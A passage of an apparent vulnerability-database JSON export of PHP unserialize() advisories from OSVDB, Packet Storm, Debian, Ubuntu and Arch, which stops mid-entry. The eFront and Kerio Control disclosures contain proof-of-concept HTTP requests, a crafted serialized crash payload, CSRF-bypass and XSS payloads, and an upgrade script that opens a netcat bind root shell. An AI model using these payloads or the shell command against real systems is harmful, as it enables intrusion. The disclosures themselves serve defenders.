URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01212)\n[Secunia Advisory ID:13481](https://secuniaresearch.flexerasoftware.com/advisories/13481/)\n[Secunia Advisory ID:13851](https://secuniaresearch.flexerasoftware.com/advisories/13851/)\n[Secunia Advisory ID:13923](https://secuniaresearch.flexerasoftware.com/advisories/13923/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:13562](https://secuniaresearch.flexerasoftware.com/advisories/13562/)\n[Secunia Advisory ID:13944](https://secuniaresearch.flexerasoftware.com/advisories/13944/)\n[Secunia Advisory ID:16322](https://secuniaresearch.flexerasoftware.com/advisories/16322/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:13568](https://secuniaresearch.flexerasoftware.com/advisories/13568/)\n[Secunia Advisory ID:13611](https://secuniaresearch.flexerasoftware.com/advisories/13611/)\n[Secunia Advisory ID:13895](https://secuniaresearch.flexerasoftware.com/advisories/13895/)\n[Related OSVDB ID: 12411](https://vulners.com/osvdb/OSVDB:12411)\n[Related OSVDB ID: 12410](https://vulners.com/osvdb/OSVDB:12410)\n[Related OSVDB ID: 12412](https://vulners.com/osvdb/OSVDB:12412)\n[Related OSVDB ID: 12413](https://vulners.com/osvdb/OSVDB:12413)\n[Related OSVDB ID: 12414](https://vulners.com/osvdb/OSVDB:12414)\nRedHat RHSA: RHSA-2005:031\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000915\nOther Advisory URL: http://www.hardened-php.net/advisories/012004.txt\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_02_php4_mod_php4.html\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-66-1\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200412-14.xml\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:151\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0146.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0332.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0173.html\nKeyword: SCOSA-2005.49\nKeyword: SSRT5998\nISS X-Force ID: 18514\n[CVE-2004-1019](https://vulners.com/cve/CVE-2004-1019)\n", "modified": "2004-12-15T08:12:00", "published": "2004-12-15T08:12:00", "href": "https://vulners.com/osvdb/OSVDB:12415", "id": "OSVDB:12415", "type": "osvdb", "title": "PHP unserialize() Function Negative Reference Arbitrary Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:19", "bulletinFamily": "exploit", "description": "", "modified": "2015-05-09T00:00:00", "published": "2015-05-09T00:00:00", "href": "https://packetstormsecurity.com/files/131845/eFront-3.6.15-PHP-Object-Injection.html", "id": "PACKETSTORM:131845", "type": "packetstorm", "title": "eFront 3.6.15 PHP Object Injection", "sourceData": "`eFront 3.6.15 PHP Object Injection Vulnerability \n \n[+] Author: Filippo Roncari \n[+] Target: eFront \n[+] Version: 3.6.15 and probably lower \n[+] Vendor: www.efrontlearning.net \n[+] Accessibility: Remote \n[+] Severity: High \n[+] CVE: <requested> \n[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf \n[+] Info: f.roncari@securenetwork.it \n \n \n[+] Summary \neFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: \u201ceFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others\u201d. \n \n \n[+] Vulnerability Details \neFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input. \n \n \n[+] Technical Details \nA PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input. \n \n[!] File: libraries/includes/copy.php \n----------------------------- \nif ($_GET['transfered']) { \n$transferedNodesCheck = unserialize($_GET['transfered']); \n} \n$copiedTests = array(); \n$copiedUnits = array(); \n$map = array(); \nforeach ($nodeOrders as $value) { \nlist($id, $parentContentId) = explode(\"-\", $value); \nif (!in_array($id, $transferedNodesCheck)) { \n----------------------------- \n \nThe injection affects the \"transfered\" parameter. \n \n \n[+] Proof of Concept (PoC) \n \n \n[!] HTTP Request \n----------------------------- \nGET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1 \nHost: localhost \nProxy-Connection: keep-alive \nAccept: text/javascript, text/html, application/xml, text/xml, */* \nX-Prototype-Version: 1.7 \nX-Requested-With: XMLHttpRequest \nCookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e \n----------------------------- \n \nA common way to exploit this vulnerability is to find a PHP magic method that can be abused and inject a properly crafted arbitrary object in order to trigger it. Although a deeper analysis has not been performed, no useful PHP magic methods have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferedNodesCheck is exclusively used within an in_array() call, only __wakeup() and __destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE-2014-8142) to create denial of service, leak memory and, under certain conditions, execute code. \n \n \n[+] Disclaimer \nPermission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131845/efront3615-inject.txt"}, {"lastseen": "2016-12-05T22:25:29", "bulletinFamily": "exploit", "description": "", "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "href": "https://packetstormsecurity.com/files/138812/Kerio-Control-Unified-Threat-Management-Code-Execution-XSS-Memory-Corruption.html", "id": "PACKETSTORM:138812", "type": "packetstorm", "title": "Kerio Control Unified Threat Management Code Execution / XSS / Memory Corruption", "sourceData": "`SEC Consult has also released a blog post describing the attack scenarios \nof the vulnerabilities within this advisory in detail and a video which \nshows the remote attack. Exploit code has been developed as well but will \nnot be released for now. \n \nBlog: \nhttp://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html \n \nVideo: \nhttps://www.youtube.com/watch?v=y_OWz25sHMI \n \n \nSEC Consult Vulnerability Lab Security Advisory < 20160922-0 > \n======================================================================= \ntitle: Potential backdoor access through multiple vulnerabilities \nproduct: Kerio Control Unified Threat Management \nvulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1 \nbuild 1324 \nfixed version: 9.1.3 (partially fixed, see vendor statement below) \nCVE number: - \nimpact: critical \nhomepage: http://www.kerio.com/ \nfound: 2016-08-24 \nby: R. Freingruber (Office Vienna) \nR. Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Protect your network from viruses, malware and malicious activity \nwith Kerio Control, the easy-to-administer yet powerful all-in-one \nsecurity solution. \nKerio Control brings together next-generation firewall capabilities - \nincluding a network firewall and router, intrusion detection and \nprevention (IPS), gateway anti-virus, VPN, and web contentand \napplication filtering. These comprehensive capabilities and unmatched \ndeployment flexibility make Kerio Control the ideal choice for small \nand mid-sized businesses.\" \n \nSource: http://www.kerio.com/products/kerio-control \n \n \nBusiness recommendation: \n------------------------ \nBy combining the vulnerabilities documented in this advisory an attacker \ncan fully compromise a network which uses the Kerio Control appliance for \nprotection. \n \nThe attacker can trick a victim to visit a malicious website which then conducts \nthe internal attack. The attacked victim must be logged in or weak credentials \nmust be configured which can be found with a bruteforce attack. \n \nThe attacker will gain a reverse root shell from the Internet to the internal \nKerio Control firewall system. Moreover, it's possible that an internal attacker \nuses the described vulnerabilities to escalate his privileges (low privileged \naccount to full root shell) to steal credentials from other users on the UTM \nappliance. \n \nMost vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found \nin just two PHP scripts. Both scripts are not referenced by any other \nPHP script nor by any binary on the system. \nBoth scripts contain a different(!), seemingly deliberate(?) CSRF bypass \nwhich make the vulnerabilities exploitable from the Internet to obtain a \nreverse root shell. \n \nSEC Consult recommends not to use Kerio Control until a thorough security \nreview has been performed by security professionals and all identified \nissues have been resolved. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nAn authenticated user (standard user or administrator) can control data, which \ngets later unserialized. Kerio Control uses PHP 5.2.13 which was released on \n2010-02-25. This version is more than 6 years old and several bugs were found \nin the meantime within the unserialize function. The following CVE numbers \nare just some examples for vulnerabilities in unserialize which lead to remote \ncode execution: \n-) CVE-2014-8142 \n-) CVE-2014-3515 \n-) CVE-2015-0231 \n-) CVE-2015-6834 \n-) CVE-2016-5771 \n-) CVE-2016-5773 \n \nPHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a \ntype confusion attack to trigger a use-after-free vulnerability. It can be used \nto read data and get full code execution. In the case of Kerio Control the \nresult of unserialize is not reflected back to the attacker. It's therefore not \npossible to read memory from the stack or heap (e.g. to bypass ASLR). \n \nNevertheless, SEC Consult developed a fully working and reliable (blind) exploit \nfor this vulnerability which spawns a reverse root shell to the Kerio Control \nsystem. \nFor this exploit a user account is required. However, it's also possible to \nconduct the attack via the Internet because the CSRF (Cross Site Request \nForgery) check can be bypassed (see below). \n \nAn attacker can use this vulnerability to break into a company network via the \nInternet by tricking a logged in user to visit a malicious website. Even if the \nuser is currently not logged in the attacker can start a bruteforce attack to \nobtain valid credentials to conduct the attack. \n \n \n2) PHP script allows heap spraying \nOne of the PHP scripts allows the allocation of memory inside the main binary \n(winroute) of Kerio Control. Winroute contains the code of most services \n(e.g. the webserver, PHP, network related functionality, ...). \nThe memory will not be freed after finishing the request and can therefore be \nused to spray payloads to the whole memory space. \n \nThis vulnerability was used in the overall exploit to defeat ASLR. \nPlease bear in mind that it's very likely that an attacker can write a working \nexploit without heap spraying. Fixing this vulnerability would therefore not \nprevent the exploitation of the remote code execution vulnerability. \nFor example, the information disclosure vulnerability from this advisory can \nbe used to bypass ASLR as well. This would eliminate the need of heap spraying. \n \n \n3) CSRF Protection Bypass \nThe PHP scripts contain code to protect against CSRF (Cross Site Request \nForgery) attacks. Because of the wrong usage of PHP binary \noperations and comparisons it's possible to bypass this check. That means \nthat an attacker can trigger requests from other websites which will be handled \nby Kerio Control. This vulnerability allows to exploit the remote code \nexecution vulnerability from the Internet to break into a network. \n \n \n4) Webserver running with root privileges \nThe main binary (which contains the webserver and PHP) runs with root \nprivileges. \n \nKerio told SEC Consult that this vulnerability will not be fixed. SEC \nConsult strongly recommended otherwise. \n \n \n5) Reflected Cross Site Scripting (XSS) \nKerio Control does not properly encode parameters which are reflected on the \nwebsite. This leads to cross site scripting vulnerabilities. \nAn attacker can abuse these vulnerabilities to modify the website or do actions \nin the context of the attacked user. \n \n \n6) Missing memory corruption protections \nThe main binary (winroute) is not compiled as position-independent executable \n(PIE). This allowed the use of ROP (return-oriented-programming) code to \nbypass the not executable heap. Moreover, the stack is per default marked as \nexecutable, but the exact location of the stack is randomized by ASLR. \n \n \n7) Information Disclosure leads to ASLR bypass \nOne of the PHP scripts leaks pointers to the stack and heap. \nThis can be abused by attackers to bypass ASLR. \nBecause stacks are marked as executable an attacker can therefore easily bypass \nASLR and DEP/NX. \n \n \n8) Remote Code Execution as administrator \nNearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code \nexecution vulnerability in the administrative web interface in the upgrade \nfunctionality. This vulnerability is still unfixed, only the associated XSS \nvulnerability was fixed. However, an attacker can still exploit it from the \nInternet, e.g. by abusing the XSS vulnerability described in this advisory \n(where the CSRF check can be bypassed). \n \nWith this vulnerability an attacker can gain a reverse root shell on \nKerio Control again if a logged in administrator visits a malicious website \non the Internet. \nMore information can also be found in the old advisory: \nhttps://www.exploit-db.com/exploits/38450/ \n \n \n9) Login not protected against brute-force attacks \nThere are no bruteforce protections in place for the login. \nIf an unauthenticated victim visits an attacker's website, the attacker can \nstart a bruteforce attack to obtain valid credentials to execute the \nremote code execution exploit. Via image-loading the attacker can detect if \nthe current credentials are valid (without violating SOP). \n \n \nProof of concept: \n----------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nThe following request can be used to set the unserialize data. In this example \na faked string is used which points to 0xffffffff (kernel memory). Unserializing \nit will therefore crash the remote webserver (the winroute process). \n \nPOST /set.php HTTP/1.1 \nHost: $IP:4081 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 730 \n \nk_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:\"k_dbName\";s:5:\"error\";s:11:\"k_dbSummara\";s:3:\"abc\";s:14:\"k_dbIndividual\";s:3:\"abc\";s:16:\"k_dbLastUsedType\";s:3:\"abc\";s:10:\"k_dbLayout\";s:3:\"abc\";s:10:\"k_pageType\";s:3:\"abc\";s:13:\"k_periodStart\";i:123;s:11:\"k_periodEnd\";i:123;s:8:\"k_userId\";i:123;s:6:\"tabBar\";i:123;s:13:\"k_gotoElement\";i:123;s:9:\"k_protoId\";i:123;s:11:\"k_errorType\";i:123;s:16:\"k_timezoneOffset\";i:123;s:9:\"k_groupId\";i:123;s:2:\"id\";i:123;s:11:\"k_dbSummary\";C:16:\"SplObjectStorage\":152:{x:i:2;O:8:\"stdClass\":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:\"\\ff\\ff\\ff\\ff\\20\\00\\00\\00\\01\\00\\00\\00\\06\\00\\00\";i:1;R:3;}}s:18:\"k_historyTimestamp\";s:3:\"abc\";} \n \nThe following request will call unserialize on the injected data: \n \nGET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nIn the example above only a denial of service will be conducted. However, an \nattacker can change the data type to object to get full code execution on \nthe remote system. \n \nSEC Consult developed a fully working exploit for this attack which spawns a \nroot shell. Please note that this exploit was intentionally written to just \ntarget Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets \nare used which belong to the winroute binary with the SHA256 hash: \n2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0 \nThis exploit will not be released for now. \n \nA real-world-attacker can detect the remote binary version by bruteforcing \nthe object handler related to CVE-2014-3515. \n \n \n2) PHP script allows heap spraying \nThe set.php script contains the following code: \n$p_variable = urldecode($_POST['k_variable']); \n$p_value = urldecode($_POST['k_value']); \n... \n$p_session->setSessionVariable($p_variable, $p_value); \n \nPOST requests with the following parameters can therefore be used to allocate \nspace on the remote system: \nk_securityHash=x&target=k_sessionVariable&k_variable=<random_name> \n&k_value=<payload_to_allocate> \n \nDuring tests it was possible to spray approximately 400 MB data in 30 seconds \nwhich is enough to control two predictable addresses on the heap. \n \n \n3) CSRF Protection Bypass \nTwo scripts are required for the remote code execution exploit: \n-) set.php \n-) ContentLoader.php \nBoth scripts contain different very interesting CSRF check bypasses. \n \nThe following code can be found in set.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash']; \nif ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) { \nexit(); \n} \n \nSince the programming language is PHP (and not JavaScript), the above code code \ndoes not work as expected. $p_postedHash can only become 0 or 1 because || is a \nlogical operator. The if-condition compares the valid token with the posted one \nvia the != operator, however, this will not check if types are the same. \nIf k_securityHash is set (either via GET or POST) to any value, the above code \nwill compare the number 1 with a string, which will always bypass the check. \nIt's therefore enough to set k_securityHash to any value to bypass the CSRF \nprotection. \n \nThe following code can be found in contentLoader.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash']; \n... \nif (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) { \n$p_page = new p_Page(); \n$p_page->p_jsCode('window.top.location = \"index.php\";'); \n$p_page->p_showPageCode(); \ndie(); \n} \n \nNow the programmers only use the GET parameter, however, they changed the \nlogical operator in the if condition from || to && which means that the CSRF \ncheck will only be applied if $p_postedHash is empty. It's therefore again \nenough to set k_securityHash to any value to bypass the check. \n \n \n4) Webserver running with root privileges \nNo proof of concept necessary. \n \n \n5) Reflected Cross Site Scripting (XSS) \nIn the following request the k_historyTimestamp parameter is prone to XSS: \nhttps://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x \n&k_historyTimestamp=aa%22;alert(1)%3b// \n \nIn the same request the id parameter can be used to inject JavaScript code. \nNote that the attack can only be conducted against administrative users. \nUsers with standard privileges can only access pages with k_dbName set to one \nof the following values: \n-) accStats \n-) prefs \n-) dialup \n-) error \n \nIn such a case Kerio Control adds code like the following \n(in this example k_dbName=dialup): \nvar k_newDbName = \"<kerio:text id=\"tabCaption_dialup\"/>\"; \n \nThe \" characters within the string are not correctly encoded. \nThis will lead to the termination of the JavaScript execution. Because the \ninjected payload is stored after this code, the attacker must bypass this \ncode to ensure that the payload gets executed. This is only possible if \nthe attacked user is an administrator because administrators can load any \ndbName. By setting k_dbName to an invalid dbName (e.g. to 'x'), code like \nthe following will be added instead (which does not crash): \nvar k_newDbName = \"\"; \n \nAnother XSS can be found at: \nhttps://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A\"><script>alert(1);</script><!-- \n \n \n6) Missing memory corruption protections \nNo proof of concept necessary. \n \n \n7) Information Disclosure leads to ASLR bypass \nThe following request returns information to the currently logged in user \n(e.g. session token and username): \n \nGET /nonauth/getLoginType.js.php HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nThe following is a typical response: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 11:47:34 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginUnlock\";k_loginParams.k_nonauthToken = \n\"0xb59066a8\";k_loginParams.k_sessionToken = \n\"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660\";k_loginParams.k_loggedUser \n= {k_asocName: \"user\", k_fullName: \"user\"}; \n \nThe above response contains a valid pointer (0xb59066a8). In most cases this \npointer will point to the heap. However, sometimes this pointer will point \ninto a readable and writeable region behind a stack-region. \nThe target location always stores the same data. During the analysis no \nfurther effort was spent on analysing this behaviour. \n \nThe pointer will also be disclosed if the user is already logged out. \nIn such a case the response looks like: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 12:04:44 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginCommon\";k_loginParams.k_nonauthToken = \n\"0xb2ee208\"; \n \n \nAn attack scenario can be: \n-) The attacker tricks a victim to visit the attacker's malicious website \n-) The attacker's website uses the CSRF bypass and the identified XSS \nvulnerability to embed a malicious script inside the Kerio Control website \n-) The attacker's website iframes the Kerio Control website to trigger the \nexecution of the XSS payload \n-) The XSS payload runs on the same domain and can therefore send requests \nand read responses. This means the attacker can send requests to \ngetLoginType.js.php to obtain a memory pointer. \n-) If the memory pointer is within a specific range (e.g. the highest nibble \nis zero), it's a pointer to the heap. In such a case the RCE vulnerability \ncan be used to crash and restart the server. After that the same check can \nbe done again. \n-) If the memory pointer points near a stack (highest nibble is 0xb), the \npointer can be used to calculate the base address of a stack. \n-) Now the attacker knows the location of a stack (all stacks are marked as \nreadable, writeable and executable). He can now easily bypass ASLR and DEP. \n \n \n8) Remote Code Execution as administrator \nAn attacker can create a malicious upgrade image with the following \ncommands: \ncat upgrade.sh \n#!/bin/bash \nnc -lp 9999 -e /bin/bash & \n \ntar czf upgrade.tar.gz * \nmv upgrade.tar.gz upgrade.img \n \nThe image can be uploaded in the administrative web interface. \nThis will bind a root shell on port 9999. The complete attack can also be \nconducted via the cross site scripting vulnerability described in this \nadvisory (XSS in contentLoader.php). This enables an attacker to conduct \nthe attack from the Internet to obtain a reverse shell on Kerio Control. \n \n \n9) Login not protected against brute-force attacks \nValid credentials can be obtained via a brute-force attack. \nIt's enough to send a POST request to /internal/dologin.php with the \nparameters kerio_username and kerio_password set. A remote attacker \ncan detect if the credentials are correct without reading the \nresponse (SOP would not allow to read the response). This is possible \nbecause /internal/photo will only return a valid image if the user is \ncurrently logged in. The attacker can load an image from this URL and \ncheck if loading was successful to leak the information if the \ncredentials are valid or not. \nThe following code demonstrates this: \n<img src=\"https://<Kerio-IP>/internal/photo\" onerror=not_logged_in(); \nonload=logged_in();></img> \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following product versions were found to be vulnerable which were the \nlatest versions available at the time of the discovery: \nv9.1.0 (Build 1087) \nv9.1.1 (Build 1324) \n \n \nVendor contact timeline: \n------------------------ \n2016-08-29: Contacting vendor through website \n(bug report: bugreports@support.kerio.com) Ticket-ID: MYW-768664 \n2016-08-31: No answer, contacting CTO of Kerio via email \n2016-09-01: Received security contact with PGP & S/MIME certificate \n2016-09-01: Transmission of PGP encrypted advisory to Kerio \n2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7 \nStatement to vulnerability 9: \n\"the feature already is in the product.\" \nStatement to vulnerabilities 4 (Webserver running with root \nprivileges) and 8 (Remote Code Execution as administrator): \n\"I do not consider this a vulnerability\" \nUpdate including a fix will be available on 2016-09-20 \n2016-09-09: SEC Consult informed Kerio to re-think the decision \nnot fixing the vulnerabilities 4, 8 and 9 \nSEC Consult highly recommends to fix all reported issues \n2016-09-13: SEC Consult informed Kerio that the advisory will be \nreleased on 2016-09-22 \n2016-09-20: Kerio releases patch for Kerio Control \n2016-09-22: Coordianted release of security advisory \n \n \nSolution: \n--------- \nThe vendor has released version 9.1.3 on 20th September which, according \nto the vendor, fixes the vulnerabilities 1,2,3,5,6,7. \n \nThe vendor told us the following regarding vulnerability 9: \n\"the feature already is in the product\" \n \nVulnerability 4 and 8 are not considered a vulnerability by the vendor \nand will not be fixed. \nSEC Consult strongly recommended fixing issue 4 and 8 as well. \n \nThe latest version can be downloaded from here: \nhttp://www.kerio.com/support/kerio-control \nhttp://www.kerio.com/support/kerio-control/release-history \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/Career.htm \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/About/Contact.htm \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF R. Freingruber / @2016 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138812/SA-20160922-0.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "A use-after-free flaw was found in PHP unserialize(). An untrusted input\ncould cause PHP interpreter to crash or, possibly, execute arbitrary\ncode when processed using unserialize().", "modified": "2014-12-19T00:00:00", "published": "2014-12-19T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-December/000183.html", "id": "ASA-201412-23", "title": "php: use after free", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "description": "- CVE-2014-9427 (information leak, remote code execution)\n\nA one-byte file containing only the '#' character, not followed by any\nnewline, causes php-cgi to do an out of bound read, potentially\ndisclosing sensitive information present in memory or even triggering\ncode execution if adjacent memory location contains valid PHP code.\n\n- CVE-2015-0231 (remote code execution)\n\nA use-after-free vulnerability in unserialize() allows a remote attacker\nto execute arbitrary code. This vulnerability results from an incomplete\nfix for CVE-2014-8142.\n\n- CVE-2015-0232 (remote code execution)\n\nAn attempt to free an uninitialized pointer may result in arbitrary code\nexecution while parsing exif information from a carefully crafted file.", "modified": "2015-01-23T00:00:00", "published": "2015-01-23T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000215.html", "id": "ASA-201501-17", "title": "php: remote code execution", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-18T13:49:12", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3117-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2014-8142\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\n http://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied on top of the imported new upstream\nversion. An out-of-bounds read flaw was fixed which could lead php5-cgi\nto crash. Moreover a bug with php5-pgsql in combination with PostgreSQL\n9.1 was fixed (Debian Bug #773182).\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-12-31T14:47:23", "published": "2014-12-31T14:47:23", "id": "DEBIAN:DSA-3117-1:8494A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00308.html", "title": "[SECURITY] [DSA 3117-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:27", "bulletinFamily": "unix", "description": "Stefan Esser reported several buffer overflows in PHP\u2019s variable unserializing handling. These could allow an attacker to execute arbitrary code on the server with the PHP interpreter\u2019s privileges by sending specially crafted input strings (form data, cookie values, and similar).\n\nAdditionally, Ilia Alshanetsky discovered a buffer overflow in the exif_read_data() function. Attackers could execute arbitrary code on the server by sending a JPEG image with a very long \u201csectionname\u201d value to PHP applications that support image uploads.", "modified": "2004-12-17T00:00:00", "published": "2004-12-17T00:00:00", "id": "USN-40-1", "href": "https://usn.ubuntu.com/40-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:30", "bulletinFamily": "unix", "description": "Stefan Esser discovered that PHP incorrectly handled unserializing objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2014-8142, CVE-2015-0231)\n\nBrian Carpenter discovered that the PHP CGI component incorrectly handled invalid files. A local attacker could use this issue to obtain sensitive information, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9427)\n\nIt was discovered 